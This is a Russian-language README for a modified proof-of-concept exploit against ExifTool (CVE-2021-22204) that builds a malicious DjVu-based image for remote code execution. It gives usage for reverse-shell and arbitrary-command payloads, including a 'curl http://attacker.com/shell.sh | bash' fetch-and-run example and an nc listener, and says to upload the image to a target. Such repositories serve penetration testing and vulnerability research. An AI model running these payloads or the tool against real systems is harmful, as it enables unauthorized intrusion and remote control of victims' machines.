
ExifTool RCE exploit (CVE-2021-22204) - улучшенная версия, без зависимости от exiftool
Улучшенный proof-of-concept для CVE-2021-22204 — уязвимости в ExifTool версий с 7.44 по 12.23, которая позволяет выполнять произвольный код при обработке вредоносных файлов DjVu.
Это производная работа. Уязвимость и оригинальный эксплойт принадлежат не мне.
| Роль | Кто |
|---|---|
| Уязвимость обнаружена | William Bowling (@wcbowling), сообщено через программу bug bounty GitLab — апрель 2021 |
| Оригинальный PoC | UNICORD (NicPWNs & Dev-Yeoj) |
| Изменения в этом репозитории | d4ytox |
Некорректная нейтрализация пользовательских данных в формате файлов DjVu в ExifTool версий с 7.44 по 12.23 позволяет выполнять произвольный код при разборе вредоносного изображения. Этот эксплойт генерирует вредоносный файл изображения, который при обработке уязвимой версией ExifTool выполняет код, контролируемый атакующим.
На основе UNICORDev/exploit-CVE-2021-22204:
exiftool -config для внедрения полезной нагрузки, что не работает, если ваш собственный ExifTool пропатчен (v12.24+). Эта версия создаёт чистую полезную нагрузку DjVu, используя только djvumake.\c)djvulibre-binЭто инженерные изменения существующего эксплойта. Исследование уязвимостей не заявляется.
sudo apt install djvulibre-bin
Обратная оболочка (reverse shell):
python3 exploit.py -s <LHOST> <LPORT>
Произвольная команда:
python3 exploit.py -c "id > /tmp/pwned"
Примеры:
# Сгенерировать полезную нагрузку обратной оболочки
python3 exploit.py -s 192.168.1.100 4444
# Сгенерировать полезную нагрузку выполнения команды
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"
# Запустить слушатель и ожидать обратного вызова
nc -nlvp 4444
Эксплойт генерирует image.jpg — загрузите его на цель, где ExifTool обработает этот файл.
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Используйте этот эксплойт только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.
Несанкционированный доступ к компьютерным системам незаконен и наказывается по закону. Используйте ответственно.
MIT, применяется только к изменениям в этом репозитории. Вышестоящий PoC не имеет лицензии, поэтому все права на него остаются за его авторами. См. LICENSE для полного уведомления об авторстве.